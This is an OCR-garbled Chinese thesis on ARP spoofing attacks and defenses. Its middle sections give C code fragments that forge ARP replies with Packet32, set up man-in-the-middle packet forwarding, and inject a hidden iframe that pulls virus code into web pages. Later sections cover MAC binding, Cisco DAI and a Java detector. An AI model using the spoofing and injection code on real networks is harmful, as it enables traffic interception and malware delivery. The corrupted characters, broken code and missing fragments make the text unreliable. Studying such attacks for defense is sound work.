ARP病毒的攻击与防范论文.docx

机都无法正常上网。这点在以前是不行能的，因为一般计克机没有管理权限来限制网美所以说。ARp欺瞒的危害是巨大的，而X1.特别难应付，非法用户和恶意用户可以随时发送ARP欺瞒和兔原数据包，这样就增加f网络管理员查找攻击源的难度-归纳ARP欺瞒类攻击的危杏性如下：(1)攻击点范闹广：不须要攻占具体服务器，在不获得目标主机的权限的条件下,只要在网络环境的任何一个点上安放一台“肉机”便可以感染整个网段：(2)攻击特别隐藏：不须要改动任何目标主机的页面或者是配置,在网络传输的过程中间干脆插入病毒的代码；(3)发觉困难：如没有机房网络管理人员帮助协查，服务器系统管理员光靠系统日志无法在短时间内找到攻击源；(4)笑原困难：网站管理制即时发觉被攻击后，但是从系统U面上无法自己清除:(5)攻击手段变更多样：黑客可以最大化的利用ARP欺瞒，将他与其他攻击方法组合后运用于多种攻击，如，侦听、拒绝服务、挂载病毒。从而实现多中攻击目的.如：窃取信息、病毒传揭、破坏网络路由，暴力广告等等：2.3ARP攻击程序结构随着互联网的发展，ARP攻击已经从早期简洁模式，即发送ARPl可应包使收欺瞒机器无法上网发展到不只是对ARP协议层的攻击。攻击者利用ARP信任局域的重大缺陷作为突破口，并通过系列数据包，专发的方法模拟出正常的通讯手段来欺蹒数据收发双方，然后作为一个透亮的网关在当中进行监听与数据伪装的方法。ARP协议MAClft数抠包转发数抠KA停止吸务攻击数«施听l三2-2ARP攻击的结构框架图整个攻击的结构如图2-2所示,全部ARP类攻击的核心原理是ARP协议MAC地址欺瞒。在数据链接层MAC地址欺瞒基础上运用类似于路由器的数据包转发技术可形成对攻击目标的网络数据侦听。然后便可以与各种攻击方式相比结合，达到数据夔截获胜利。由于ARp缓存表项是动态更新的,其生命周期默认是两分钟,假如再没有新的信息更新，ARP映射项将会自动去除。所以，假如要保持A上的错误信息，C接下来要做的就是始终连绵不断地向A和B发送虚假的ARP晌应数据帧，让A的ARP缓存中保持被篡改了的映射表项。A能要连接8需要妇潮泞1.ACiSrARPS读以ARP龙4B的MAC交成CCCCCCCCCCCC栩误连接CCCCCCCCCCCC图2-5ARP欺瞒的流程图2-5演示了如何运用ARP协议固有的缺陷对其进行欺瞒，但是仅仅这种欺瞒并不能完成对A与B之间数据交换的窃听与篡改，缘由是，光有其次%的欺瞒是不够的,在建立起数据连接层欺瞒后，虽然A对这个变更一点都没有意识到，但是接下来在进行网络层TCP/IP握手以及应用层会话建立时由于C上并没有能仿照B的应用端口监听，所以A和C是无法建立连续连接的，通常当TCP/IP:次握手不胜利时，A与C的接限制功能.不过在Windows中，暇如安装了TCP/IP网络协议组件，就可以执行吩咐RP.ARP吩咐的作用是查看本机的AR峻存、静态绑定IP地址和MAe地址和删除静态绑定项。其实绑定IP地址和MAC地址的本意是为r削减ARP广播流量，只是可以利用这一功能来限制IP地址的运用。(4)不同操作系统中ARP设置的差异：在WindOwSSerVer2(X)3和XP以前的WlNDowS系统中，就算设置了静态MAC地址绑定项，同样会通过接收其他主机的数据包而更新己经绑定的项。而在WindOWSSCrVCr2003和XP中，静态绑定的项不会被动态更新，直到TCP/IP协议终止为止，例如重启计算机。假如耍创建永久的静态MAC地址绑定项，可以写一个脚本文件来执行ARP势态绑定，然后运用安排任务在启动计算机时执行该脚本即可。(5)ARP高速缓存超时设置：在ARP高速缓存中的表项一般都要设理超时值.默认状况卜ARP缓存的超时时限是两分钟，假如再没有新的信息更新，ARP映射项会自动去除。所以，为了保持A与C被修改的ARP表，B始终连绵不断地向A和C发送这种虚锻的ARP响应包.可以在注册表中进行修改。可以修改的键值有两个，都位于HKEY_1.OCA1._MACH【NE'SYSTEMCurrcntControlSetScn-iccsTcpipParameters<.键值1：ArpCache1.ife,类型为DWOrd.单位为秒，默认值为120。健值2：ArpCachcMinRcfcrcncc<I1.ifc.类型为Dword,单位为秒，默认值为600这些健值默认是不存在的.假如想修改,必需自行创建，修改后重启计算机后生效,假如ArpCaChe1.ife的值比ArPCaCheMinReferenCed1.ife的值大，那么ARP缓存的超时时间设置为ArPCaChe1.ife的值。假如ArPCaChC1.ife的值不存在或者比ArPCaCheMinReferenCed1.ife的值小，那么超时时间设置为12()秒，对于正在运用的ARP缓存，超时时间则设置.为ArPCaChCMinRCfCrCnCed1.ifC的值。2.6ARP伪造帧格式在ARP攻击中，黑客是运用ARP协议缺陷更改ARp缓存表的.要发动ARP欺蹒攻击须要获得ARP恳求与应答帧的格式。ARP帧运用是工作在数据琏接层的协议，它也可以用于其他类型的网络以解析IP地址以外的地址(报文第13、14两字节的“帧类型”以及15、16字节“硬件类型”以及17、18字节“协议类型”说明白解析的是什么网络)。对于ARP攻击我们仅探讨在以太网地址解析时的格式。ARP恳求和应答帧的格式如图2-7所示：表2-2ARP帧机构试脸的IP-MAC地址比照关系机器IP地址MAC地址状态A192.168.1.1aaaaaaH3auaaA机器上MAC表被修改B>CCCCCCCCCB192.168.1.2bb-bb-bb-bb-bb-bbB机器上.VAC茨被修改A-CCCCCCCCCC192.168.1.3cc-cocccccc-cc攻击源D192.168.1.4dddddddddddd(1)假设在表2-2网络环境中：A主机的IP地址为，它现在须要与IP为的主机(主机B)进行通讯，那么将进行以下动作：(2)A主机查询自己的ARP缓存列表，假如发觉具有对应于11的IP地址的MAC地址项，则干脆运用此MAC地址项构造并发送以太网数据包，假如没有发觉对应的MAC地址项则接着下一步：(3)在A主机发出ARP解析恳求广播的过程中，A会发出一个目的MAC地址是卜F：FF:FF:FF:FF:FF的ARP恳求帧，来恳求IP为的主机回笈MC地址：0x08061l-10x0800卜卜卜卜卜科卜AAASEiE1UAAA!AA1«IUUMWIttIUI:H14字可以人网人28字节Awil求或应存图28ARP恳求数据帧格式(4)B主机收到ARP解析恳求广播后，I可笑给A主机一个ARP应答数据包，其中包含自己的IP地址和MAC地址bb-bb-bb-bb-bb-bb：在表2-2示例的网络环境中，当主机A在自己的缓存中找不到B的MAC地址而须要进行询问BkA发送了个ARPi旬间报文.在这个报文中，目的地址为全I(FF-FF-FF-FF-FF-FF)的特殊广播地址。广播域内链接的全部以太卡网都会接收广播的数据帧。广播报文结构娟图3-1所示:图3-1ARP广播帧构造对一个ARP恳求来说，除目的湍彼件地址外的全部其他的字段都有填充值.当系统收到一份目的端为本机的ARP思求报文后，它就把硬件地址填进去，然后用两个目的端地址分别替换两个发送端地址，并把操作字段置为2,最终把它发送回去。所以，我们要进行ARP欺瞒所须耍构造的伪装应答报文如下所示：0x080614字双入同人28字VAKr承率或匕骨图3-2ARP欺瞒帧构造构造报文的结构代码可以这样写：苜先我们定义“14字节的以太网头部''结构ETHHDR1：Iypedefstructethhdrl(/«定义”14字节的以太网头部unsignedcharch-ds(6;产目标以太网地址6字节*/unsignedcharch-srcl6;/“源以太网地址6字节*/unsignedShoriehjype;)产帧类型2字节*/ETHHDRI,*PETHHDRI;定义”28字节的ARP恳求或应答”的结构:»/memcpy(ARPPacket1.e1hhdr1.eh-dst,MacAddr,6);/*定义目的MAC地址AAAAAAAAAAAA*/ToMacddrt"CCCCCCCCCCCC".Macddr)*4CCCCCCCCCCCCt成MAC地址*/mcmcpy(ARPPackctl.Cthhdrl.eh-src.MacAddr.6);定义源MAC地址cccccccccccc*/ARPPackct1.ethhdr1.ch-typc=htons(T_ARP);常量ARP表示ARP的类型值*/ARPPacketI.ethhdr1.arp,hrd=htons(H_ARP);/*值为1即表示以太网硬件类型/ARPPackctI.cthhdrl.arp.pro=htons(T_IP);产常此P协议表示IP的类型值*/,XRPPackctI.cthhdrl.arp.hln=6：*MAC地址长度为6字节"/ARPPacketI.ethhdr1.arp-pln=4;*IP地址长度为4字节*/ARPPackclI.cthhdrl.arp.op=htons(OP_ARPB);产OP操作类里2表示ARP应答*/ToMacAddrfccccccCCCCCC".MacAddr);nemcpy(ARPPacket1.arphdrI.arp-sha.MaCAddr.6)：伪造的B的N4AC地址ARPPacketI.arphdrl.arp-spa=inet.addr("l92.168.1.2");/B的IP地址ToMacAddrCAAAAAAAAAAAAWlacAddr)mency(ARPPackei1.arphdr1.arpjha,MacAddr,6);目标A的MAC地址ARPPackctl.arphdrl.arp-tpa=inet_addr("l92.l68.1.l");目标A的IP地址3.2发送ARP欺瞒帧在3.1中已经构造了伪装的ARP【同更报文ARPPaCkCII,接下来须要将数据包发送到局域网内主机A上。在此我们运用开发包PaCkCt32中供应的APl函数组。PaCkCt32是闻名的网卡数据读写开发包他有众多版本，在这里运用的是最常用的微软PACKET32.h,现在闻名的网络监听程序如nisni11EthernctSpy,ntpackci,WinPCaP等都运用Packet32开发。应用程序通过PaCket32下PaCketSendpaCkel等函数可以干脆操作网卡,设置网卡的工作模式，干脆在网卡上读写数据“Packe32包中的有如下一些功能函数：(I)PaCkeIGetAdaPlerNameS:从注册表中读取网卡名PaCkCtIniIPaCkeUlPPaCkCl,SZPaCkCIBuf.60);if(PacketSetNumWrites(lpdapter.2)=F1.SE)PrinlH"warning:Unabletosendmorethanonepacketinasinglewrite!n");(6)发送我们构造的伪造ARP数据包if(PacketSendPacket(lpdapter.lpl,acket.RUE)=F1.SE)printf("Errorsendingthepackets!n");return0：prinf("Sendok!n");(7)关闭网卡PacketFreePacket(IpPacket);PackctCloscAdaptcr(IpAdapter);以上程序使A接收到一个被伪造的ARP应答，对目标A进行欺瞒。A发送数据到主机B却发送到了CC-CC-CcCCVCCC这个地址上。这种效果正是前文所描述的，ARP欺瞒胜利。但是，完整的ARP欺瞒须要进一步做数据的转发，因为A虽然对错误的缓存不能辨别，但是接卜.来的数据交换中，A与B之间就会由于数据无法匹配而终止通信。因为A发往B的数据转发到了C,所以A在一段时间内无法得到来自B的合法回熨后，将危识到通讯存在问邀。因此，接下来须要C来做“Man-In-TIK-MiddlC”或定向。3.3同时发向两台机器的“Man-In-The-Middle”做“Man-In-The-Middle'进行ARP重定向.首先须要使C同时发两个应答帧到通信的双方A与B。这样C将成为A与B之间的ARP代理，相当与C是AB间的路由器。(1)同时构造两个ARP应答帧(应答帧中常量定义不再重述)。ArppacketiARPPaCkCti；定义一个数据报文结构TOMaCAddrCAAAAAAAAAAAA",MacAddr)将字符串AAAAAAAAAAAA转化成MAC地址mcmcpy(ARPPackctI.cIhhdrl.ch-ds(,MacAddrl6);定义目的MAC地址AAAToMacAddrt"CCCCCCCCCCCC".MacAddr)符字符串CCCCCCCCCCCC转化成MAC地址memcpy(ARPPacketI.ethhdr1.eh-src,MacAddr,6);定义源MAC地址prinif("ScndtoBok!n");PacketFreePacket(IpPacket);PackctcioscAdaptcr(IpAdaptcr);3.4IP数据包的转发IP转发功能，A发送过来的数据包，转发绐C,好比一个路由器一样。不过，假如B发送ICMP重定向的话就中断了整个安排。干脆进行整个包的修改转发，捕获到A发送给的数据包，全部进行修改后再转发给C,而C接收到的数据包完全认为是从A发送来的，不过，C发送的数据包又干脆传递给A,倘如再次进行对C的ARP欺瞒。现在B就完全成为A与C的中间桥梁了。(1)将B发向A的数据包转发到AIpPackct=PackctRcccivcPackct(IpAdaptcr.lpPackct2.TRUE);if(PacketSelPacket(lpAiapter,IpPacketI,TRUE)=FAIE)printf("Errorsendingthepackets!n");retu110:)printf("SendtoAok!n");(2)将A发向B的数据包转发到BIpPackct=PackciRcccivcPackct(lpAdaptcr.IpPackciI,TRUE);if(PacketSendPacket(lpdapter.lpPacket2.RUE)=F1.SE)printft"Errorsendingthepackcts!n");return0;)printf("SendtoBok!n");PackctFrccPackct(lpPackct);PacketcioseAdapter(IpAdapter);3.5侦听攻击源C既然可以收取与转发数据，当然也就可以侦听A与B之间的通信数据f.例如同域网环境为，子网掩码为，网关为。我们的IP为，想要的数据包。由于网关为,所以我们就只要欺瞒和就可以了。也就是说告知,的MAC地址是自己(192.168.0.3)；然后再告知的MAC地址是自己(192.168.0.3)。这样以来全部的数据包都会发到，并且由实现转发同样在上面也会发觉和的MAC地址是一样的。这样我们就在和之间实现了ARP欺瞒。3.6用ARP攻击WINDOWS系统(1)攻破屏幕爱护：利用IP冲突的级别比屏保高，当有冲突时,就会跳出屏保。毒挂载。可以不用获得目标主机的权限就干脆在他供应的网页上加栽病毒.这种手段特别隐版,不改动任何目标主机的页面或者是配置，在网络传输的过程中间干脆插入病毒的语句，或是调用其他网站上事先打兑好的病毒.如上文所述，“Man-In-Tlw-Middlc''重定向，事实上相当于将攻击服务器作为路由转发设备。以表2-3中环境为例，正常状况下A访问B.A是访问的正常客户.B服务器,C是攻击主机，当ARP攻击胜利实现"Man-In-Thc-MiddkTiIt定向后，C成为A与B之间的IP包转发岩。这时，A向B发出恳求C推断卜是哪个客户端发过来的包.转发给B,然后B返回响应的时候,在响应包中,插入一段病毒的代码,再将修改过的包返回的正常的客户A,此时完成一次病毒拄载。本文中第章:的实例就是ARP挂病奇攻击。WEB服务器网关的MAC地址被ARP攻击篡改为攻击源地址，欺瞒了数据报走向，然后攻击源修改一些定义的关键字加<iframesrc="pp.900666"width=Iheight=!Iramcbordcr=OxZiframO.最终使全部访问的客户机中毒。第4章ARP欺瞒攻击防范4.lARP防护整体布局思路在上文我们分析了ARP欺瞒攻击的原理危击，以及关键攻击源代码。了解到ARP类攻击的特征后，我们可以通过在计算机或者交换涔上绑定MAC地址来防止ARP欺瞒，但是在大型公众上网网络环境中作到每个单点都进行MAC绑定就相当困难所以须要在网络环境中安插ARP欺瞒包探测工具来进行整体的布局，以应对ARP欺瞒可能存在的多种攻击手段，如：拒绝服务、数据窃听、病毒木马挂我、强制访问等。从上文ARP攻击原理我们可以看出，防范ARP欺瞒攻击最大困难在于其攻击不是针对服务器或交换机系统本身的，而且攻击源可以在网段内任何个地方降版，其隐藏性很高。所以有时候即使我们发觉了攻击的存在，要在最短时间内快速定位攻击源也是特别困难得事情。这就意味着像防治一般攻击或病毒那样单一的从服务器系统或者从网络网关上进行防范效果不是很好.因此，我们提出的ARP攻击防范策略须要从三方面同时入手：计算机系统平安加固、MAGARP对应表管理、以及网络非法ARP包探测.安全监管设备防护非法ARP包嗅探ARP广播包隔高ARP服务器图4-1ARP攻击防护体系在图4-1中描述了ARP综合防护体系中各种手段的组成。具体方法作（I）设置静态的MAClOlP对应表，并防止黑客刷新静态转换表。不要把网络平安信任关系建立在IP基础上或MAC基础上，尽量将信任关系应当建立在IP+MAC上。（2）运用MAC地址管理服务器。通过该服务器查找自己的ARP转换表来响应其他机器的ARP广播。（3）运用代理IP的传输.（4）运用防火焙隔离非信任域对内网机器的ARP包传输。（5）定期运用rarp恳求来检查ARP响应的式实性.（6）定期轮询检杳主机上的ARP缓存。（7）运用防火墙连续监控网络。（8）运用ARP探测工具，在网络上探测非法ARP广播数据帧.4.2 计算机系统平安加固目前很多常见的般ARP攻击常常以病毒程序的形式存在。其中传播甚广的有“网游大盗”、嗝波”等，这些ARP病毒寄存于WindoWS系统中，且一般会用到叩PtOoISdl等系统漏洞，所以只要做好对操作系统的升级与加固可以防止此类病毒感染.（I）IIPPtOOIS.dll是WindoWS系统的一个动态底（networkpacketproviderOoIShClPCr）被ARP病毒利用，所以，禁止了npptoolsdl将使此类病毒无法正常运行。具体方法是:在平安模式中，打开WINDoWSVSYSTEM32式PPTOO1.S.D1.1.文件。删除这个文件后，用零字节的文件替换。最终将nnpiods.dll保存为只读文件。（2）给系统安装补丁程序。通过WindOWSUPdate安装好系统补丁程序（关键更新、平安更新和SerViCePaCk）（3）给系统管理员帐户设置足够用难的强密码，最好能是12位以上，字母+数字+符号的组合：也可以禁用/删除些不运用的帐户（4）常常更新杀毒软件（病毒库），设置允许的可设置为每天定时自动更新。安装并运用网络防火墙软件，网络防火墙在防病毒过程中也可以起到至关重要的作用，能有效地阻挡白来网络的攻击和病毒的入侵。部分盗版Windows用户不能正常安装补，不妨通过运用网络防火墙等其它方法来做到肯定的防护（5）关闭也不须要的服务，条件允许的可关闭些没有必要的共享，也包括C$、DS等管理共享，完全单机的用户也可干脆关闭SCrVCi服务4.3 ARP杀毒软件目前，有一些安装在系统上的ARP专杀软件和病毒防火墙产品可以通过在系统内核层拦截虚假ARP数据包以及主动通告网关本机正确的MAC地址，它能够保障单机与网美之间数据流向不经过第三者。ARP防火墙的功能包括：（1）拦截ARP攻击：在系统内核层拦截外部虚假ARP数据包，保障系统不受ARP欺瞒、ARP攻击影响，保持网络畅通及通讯平安：（2）在系统内核乂拦技本机对外的ARP攻击数据包，以削减感染恶意程序后对外攻击给用户带来的麻烦：（3）拦截Ip冲突。在系统内核层拦截IP冲突数据包，保障系统不受IP冲突攻击的影响:（4）拒绝服务攻击抑制。在系统内核层拦截本机对外的TCPSYN/UDPUCMP/ARPDoS攻击数据包，定位恶意发动DOS攻击的程序：（5）除了网关外，不响应其它机器发送的ARPReqUeSI,达到隐身效果,削减受到ARP攻击的几率：（6）ARP数据分析。分析本机接收到的全部ARP数据包，驾驭网络动态，找出潜在的攻击者或中毒的机器；（7）监测ARP缓存。自动监测本机ARP缓存表，如发觉网关MAC地址被恶意程序篡改；（8）主动防卫。主动与网美保持通讯，通告网关正确的MAC地址，以保持网络畅通及通讯平安；（9）追踪攻击者。发觉攻击行为后，依据ARP包内数据来锁定攻击者IP地址：（IO>ARP病毒专杀。依据ARp病毒特征码来扫描病毒：（12）AR呦存爱护。防止恶意程序篡改本机ARP缓存。（13）自身进程爱护。防止被恶意软件终止。虽然这些ARP病毒防火墙与专杀杀软件能够保证系统自身ARP表的正确性，然而只要他访问的服务器被攻击者实施“Man-In-Thc-Middlc'',同样会使得机器中诲。这点更加说明白整体防护对反抗ARP攻击的重要性。4.4 ARP攻击探测器IP地址与MAC地址绑定是最荷洁有效的ARP攻击防卫方法。但.是，在大型公众上网环境中运用静态IP地址和MAC地址的绑定会带来巨大的管理负荷.在大型公众上网网络中无法有效对每一台终端、服务器与网络设备都运用静态ARP发。首先，公众网络终端数量浩大般的营业性网吧中通常有几百台终端,加上交换机与网络设备后须要维护的ARP表有上千个之多，全部人工设置不现实。其次，DHCP网络动态地址安排以及各种负载均衡策略将无法适应MAC地址绑定。所以，除了MAC地址管理之外，通常须要运用ARp攻击探测器进行对ARP攻击的防卫。目前市场上还没有成熟的特地针对ARP攻击的探测器。在大型网络中可以自己通过编程实现，其原理是在其上运行存放一张局域网ARP表，记录有权威的ARP信息，嗅探得通过IDS的原理在路由器镜像侦听局域网内ARP广播包内容，假如网络内广播包与ARP表不一样，或者ARP广播帧超过合理数量的阀值，则探测器分析后会匹能找到ARP欺欺瞪特征后，探测器立刻报警并进行相应的策略战动。以下列举一个简沾的程序片段，他将ARP数据帧中的地址与网关地址比较，假如不一样则报警。staticStringrouter="00:14:f2:3c:8c:00"网关ARP,staticStringroutcrip="63.125.35.29"：网关IP.staticStringbroadcast="00:00:00:00:00:00"publicstaticvoidarp()throwsjava.io.IOExcetion(省略°°°°°°i(.getSendeHar<lwareAddress().toString().equals(rouier)p.gctTargctHardwareAddrcss().toString().cquals(router)Hp.getSenderProtocolAddressf).toString().equa1s(routerip)p.gctTargctProtocolAddrcss().toString().cquals(routcrip)if(p.gctScndcrProtocolAddrcss().toString().cquals(r<>utcrip)if(!(p.getSenderHardwareddress().toString().equals(router)p.gclScndcrHar<lwarcAddrcss().(oString().cquals(broadcasl)SyStem.OU1.priinlnCTackte:ABoUTROUTER->"+p.toString();SyStemQutprintlnC发觉病母:在主机"+p.gctScndcrProtocolAddress().toString();pw.prinlln("发觉病毒:"+p.loString();省略。4.5 MAC地址集中管理MAC地址与IP地址的绑定是最简洁有效的ARP攻击防丑方法。然而，虽然这种设置在单机上特别荷洁实现，但是，在大型公众上网环境中运用静态IP地址和MAC地址的绑定会带来巨大的管理负荷。在大型公众上网网络中无法有效对每一台终端、服务器与网络设备都运用静态ARP表.首先，公众网络终端数用浩大一般的营业性网吧中通常有几百台终端，加上交换机与网络设备后须要维护的ARP表有上千个之多,全部人工设置不现实。其次，DHCP网络动态地址安排以及各种负载均衡策略将无法适应MAC地址绑定。因此，解决公众网络上ARP攻击做统一的集中管理。然而，面对大型网络中上万条MACglP信息,以及困难多变的网络结构，做到这一点并不简洁。传统的交换机MAC地址管理现阶段很多网络加固方案中都采纳了交换机IP和MAC绑定方案。在CiSCo中有以下一般有两种方案可供选择,在具体的交换机端口上绑定特定的主机的MAC地址，或是在端口上绑定MAC地址扩展访问列表。(1)基于端口的MAC地址绑定。登录进入交换机，进入配置模式，进入具体嫡口配置模式，配.置端口平安模式"然后运用SWilCh(Config-if)switchporiport-securitymac-addressMAC来绑定的主机的MAC地址(2)基于MAC地址的扩展访问列表。登录进入交换机，在ACCESS1.lST中定义一个MAC地址访问列表，然后使这个访问列表能够访问任何主机。(3)另外，思科DynamiCARpInSPeClion(DAI)在交换机上供应IP地址和MAC地址的绑定，并动态建立绑定关系.DAl以DHCPSnoOPing绑定表为基础，对了没有运用DHCP的服务器个别机器可以采纳静态添加ARPaCCeSS-HSt实现。DAl配更针对V1.AN,对于同V1.AN内的接口可以开启DAI也可以关闭。通过DAl可以限制某个端口的ARP恳求报文数量。不论是以上第一种、其次种或是CISCO交换机的MAC地址管理方式在浩大的网络中都不适用.这是因为：首先大型网络中的交换机部署是星型分散的，每个交换机分别链接有一群计兑机，而不是全部计算机连接在同一个交换机上，所以不行能实现真正的中心管理。其次，将张浩大的ARP表或者ACCESS1.IST表放置在交换机的内存中将严竣影响网络速度，而交换机也不是数据库，无法对此表做有效管理。综合以上两点，在此提出一种新的MAC地址集中管理方式，“MAC地址扫描管理工基于地址扫描的MAC中心管理MAC地址中心管理系统须要具备两个要素：第一，能筋取得网内任何一台机器的MAC地址。其次，可以管理张浩大ARP映射衰。出于这两点考虑，MAC地址扫描管理的设计思想是在网络上建立一台MAC地址中心管理服务器，其上维护J'一张全网段的ARP映射表。然后此机器上安装MAC地址扫描程序，可以定时扫描网内各个用户端网卡MAe地址,系统将MAC地址与自己保存的ARP表相互对应通过MAC地址与IP地址对应关系的分析后就能有效的找出非法MAC地址的地点。探测对比MAC-IP匹配与ARP表不符探测对比MAC-IP匹配与ARP表符合图42MAC地址扫描管理如图4-2所示，共中MAC管理服务器C维护有一张全网ARP表，他知道网内每台机器MAC与IP地址的对应关系。并且C能铭定时扫描获得网内各个机器的MAC地址。C扫描A、B两台机冷的MAC,与自己的ARP表相比较，发觉A机器的信息与ARP表不符，即能发觉A为网络系统内攻击源。这种基于地址扫描的MAC中心管理系统具有两个优点。第一，在系统上可以便利高效的管理上万条信息的大型ARP表。其次，能探测到各个V1.an中的MAC地址信息。总结随着近年来“ARP.地址欺瞒类攻击的兴起，公众上网设施由于其终端众多、网络广播域大、平安防护网关缺乏、用户层次面广的特征，极易被不法分子利用，他们运用ARP攻击发布不良信息、监听盗取用户帐号、在公众服务网页挂载恶意代码等，已经影响到区域内公众上网平安.通过对ARP攻击原理的剖析，可以总结出ARP攻击的根源在于ARP协议自身缺陷。拒绝服务攻击、侦听、病毒挂教、WindOWS系统攻击、交换机攻击等多种混合类攻击的实现原理都是基JARP广播包信任缺陷。可以运用SOCkel编程实现基TARP欺瞒的各类攻击手段。传统上运用MAe地址与IP地址的绑定是最简洁有效的ARP攻击防卫方法,然而，虽然这种设置在单机上特别简洁实现，但是，在大型公众上网环境中运用静态IP地址和MAC地址的绑定会带来巨大的管理负荷。在大型公众上网网络中无法有效对每一台终端、服务器与网络设符都运用静态ARP表.这是因为公众网络终端数量浩大一般的营业性网吧中通常有几仃台终端，加上交换机与网络设备后须要维护的ARP表有上千个之多,全部人工设置并不现实。并旦，DHCP网络动态地址安排以及各种负载均衡策略将无法适应MAC地址绑定.本文在ARP协议探讨的基础之上，针对正在兴起的营业性网吧和非营业性社区信息苑大型网络的特点设计公众上网环境内整体ARP攻击防护方案，文中提出的ARP攻击防范策略主要从三方面入手：计算机系统平安加固、MAGARP时应表管理、以及网络非法ARP包探测。致谢首先要感谢我的导师路凯老师，在两年半学习和生活中给了我极大的帮助与关怀.导师治学严谨，学识广博，平易近人，给我留下JZ深刻的印象.该课题能顺当完成，离不开导加的关切与指导，在此向导舞表示诚心的感谢。感谢我的同学在我的学习和生活中都给了我极大的帮助和关切.遇到问题时.常常牺牲个人时间为我答疑解惑，常常能得到他们的细心指引和启发，在此向他们的无私精神表示真诚的谢意。最终要感谢全体老师与同学在整个学习过程中，赐予了我无微不至的关爱与支持，使我有坚决的信念克服困难、完成学业。参考文献|1）双木网络管理之ARP协议篇中国电脑教化报2009,6ARP协议分析中国协议分析网:/i（zero31豆豆技术应用Ci$co交换机中IP地址与MAC地址绑定方法Wkxhddvip|4|硅谷动力ARP攻击的防范国家计算机病毒应急处理中心2009年全国信息网络平安状况与计算机病毒疫情调查分析报告2009,12|6）杨卫平，源收防范ARP病港攻击人民邮电出版社2009,27J刘卫华、管会生、钝海强ARP改进与实现中国科技论文在税2008,1218吴高凯胡文华局域网ARP攻击、防范与追踪中国铁道出版社2008.6|9谢希仁.计算机网络M.北京:电子工业出版社,2007,610Ek>ujlasEC.用TCP/IP进行网际互联（第1卷）:原理、协议与结构MI，版.北京:电子工业出版社，2006,7.111王奇以太网中ARP欺嘴原理与解决方法切.网络平安2007,2.12陆余良.张永等.ARP协议在局域网类型探测中的应用可计算机工程2004.